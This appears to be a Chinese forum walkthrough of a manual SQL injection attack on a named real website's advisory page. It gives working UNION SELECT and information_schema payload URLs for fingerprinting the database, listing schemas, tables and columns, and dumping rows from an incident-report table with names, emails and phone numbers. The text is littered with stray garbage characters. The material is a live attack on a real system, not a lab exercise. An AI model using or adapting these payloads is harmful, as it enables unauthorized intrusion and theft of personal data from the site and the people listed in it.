1.判断版本http://www.cert.org.tw/document/advisory/detail.php?id=7 and ord(mid(version(),1,1))>51 返回正常,说明大于4.0版本,支持ounion查询) Y; f" N, _: i) A% K
2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解' I c3 }/ } o* @
http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,2,3,4,5,6,7,8,9--1 B- j: f3 N' \- A( J
3.查看数据库版本及当前用户,http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,user(),version(),4,5,6,7,8,9--- ?# |/ f) ^) T' ]
数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,有待牛人去考证。9 U7 m$ h& Z; l$ w5 M
4.判断有没有写权限/ o' A6 m- }4 ^. X, b! P4 w
http://www.cert.org.tw/document/advisory/detail.php?id=7 and (select count(*) from MySQL.user)>0-- 返回错误,没有写权限8 [: S" O! |& ]7 P- O
没办法,手动猜表啦$ g+ I& a3 p. `" A$ o& J$ `; x
5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,14 { {$ g }, w" \) Y. V
但是这个点有点不争气,用不了这个命令,就学习了下土耳其黑客的手法,不多说,如下' b2 F9 C+ Z+ Y9 W
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--
5 B0 M4 j. W/ M K成功查出所有数据库,国外的黑客就是不一般。数据库如下:
# I, C* o* F- c* t% } ~. zinformation_schema,Advisory,IR,mad,member,mysql,twcert,vuldb,vulscandb& Z9 | _+ T0 C
6.爆表,爆的是twcert库
/ w7 X+ O# y* d3 ]$ Ohttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--8 I0 ?' e6 |: b7 h# n/ s
爆出如下表 S+ y8 `) h/ k
downloadfile,irsys,newsdata,secrpt,secrpt_big5
- X9 y$ j5 \4 _7 }9 i* V- G7 x7.爆列名,这次爆的是irsys表
$ P' i9 N' l9 g, s# L* Vhttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--
) t/ x7 ^: r! h9 V# L爆出如下列0 \! g3 j, {2 f/ d8 W
ir_id,name,company,email,tel,pubdate,rptdep,eventtype,eventdesc,machineinfo,procflow,memo,filename,systype,status
4 T/ ], E1 S& H: b% h2 x8.查询字段数,到这一步,国内很少有黑客去查询字段数的,直接用limit N,1去查询,直接N到报错为止。# M; K+ V: b0 T4 ?3 u$ s2 y0 g
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--
. Y5 M9 R" b. \# A, F返回是3,说明每个列里有3个地段" Q" z" d, _9 m, m+ m
9.爆字段内容/ C( T( e" H, {, v$ q1 Y
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--
! _7 T: e) _# q9 t4 W6 y7 L' C爆出name列的第一个字段的内容4 E% h4 x& l, @/ N) {
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--
- ?* }4 T9 \ F }爆出name列的第二个字段的内容 |